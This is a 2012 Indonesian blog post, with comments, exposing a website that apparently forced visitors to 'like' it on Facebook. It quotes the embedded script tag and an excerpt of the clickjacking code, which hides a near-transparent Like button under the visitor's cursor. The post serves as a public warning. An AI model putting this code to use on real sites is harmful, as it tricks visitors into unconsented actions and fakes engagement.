[Hacking]Kecurangan AksiWebId


Dear Developer www dot Aksi dot web dot id, saya mohon hentikan dengan sangat KECURANGAN anda dengan melakukan otomatisasi FB like ketika pengunjung datang ke salah satu postingan anda hanya untuk membuat web anda populer di facebook. Saya bisa melaporkan ini ke pihak FB. Berikut kode buatan anda yang mebuat semua orang secara otomatis me-LIKE web anda :

<script>window.DO_CLICKJACKING = 1</script>
<script src="http://dhanee7ruh.googlecode.com/files/clickjacking.js"></script>


Pada bagian clickjacking.js :

if (window.DO_CLICKJACKING) { // wrap up EVERYTHING 
	
	$J("body").append('<div id="clickjacking" style="position:absolute;display:block;opacity:0.01;-khtml-opacity:.01;-moz-opacity:.01;filter:alpha(opacity=1);"><fb:like layout="button_count" show_faces="false" width="100"></fb:like></div>');
/*	$J("body").append('<div id="clickjacking" style="position:absolute;display:block;"><fb:like layout="button_count" show_faces="false" width="100"></fb:like></div>');*/
	
	var elementWidth = 0; 
	var elementHeight = 0; 
	var theElement = '';
	var likeDone = 0;

	if ($J.cookie("clickjacking_"+escape(document.URL)) == 1)
	{
		likeDone = 1; 
	}



	// fired when the user clicks a link (likes our page) -> clickjacking is done
	FB.Event.subscribe('edge.create', function(response) {
		  $J("#clickjacking").css("display", "none");
		  likeDone = 1;   
		  $J.cookie("clickjacking_"+escape(document.URL), "1");
		  // let the user actually go to the link he clicked. 
		  window.location.href = theElement.attr('href');
	});

Cara anda ini sungguh tidak terpuji. Mohon dengan sangat hapus kode tersebut dari web anda ! Dan Facebook juga harus menutup lubang keamanan ini.

    • ordinary egi
    • Februari 10th, 2012

    betul bu, wlopun sebenernya tulisannya sendiri ga jelas maksudnya

  1. mantap bu… sering2 share website yg curang biar para pngunjung terhindar dari kecurangan..🙂

  2. kereeeeeeeeeen mbk ^^

  3. Pernah baca tentang clickjacking ini, ga nyangka udah ada aja yg nerapain utk hal beginian ya

  4. saya malah gak make trik ini di web saya… tp saya share trik ini di http://7ruh.com/membuat-clickjacking-facebook/

  5. Haha. Ada yang pakai skrip ya?😆
    Kalau di wp.com masih amanlah itu. Memang macam2 saja caranya orang nyari trafik ah.

    Btw, salam kenal. Tadi kirain yang kelola blog ini cowok:mrgreen:

    • Pirtom Lubis
    • Maret 1st, 2012

    Untung gak main Facebook lagi. Dan lebih untung gak suka main ke situs itu.😀
    Btw thanks atas informasi dan kejelian ibu.
    Kira-kira mereka udah hilangin scriptnya atau blm ya?

  6. thanx infonya…salam kenal dan sukses slalu yaaa

  7. mantappp bu…😀

  1. No trackbacks yet.

Tinggalkan Balasan

Isikan data di bawah atau klik salah satu ikon untuk log in:

Logo WordPress.com

You are commenting using your WordPress.com account. Logout / Ubah )

Gambar Twitter

You are commenting using your Twitter account. Logout / Ubah )

Foto Facebook

You are commenting using your Facebook account. Logout / Ubah )

Foto Google+

You are commenting using your Google+ account. Logout / Ubah )

Connecting to %s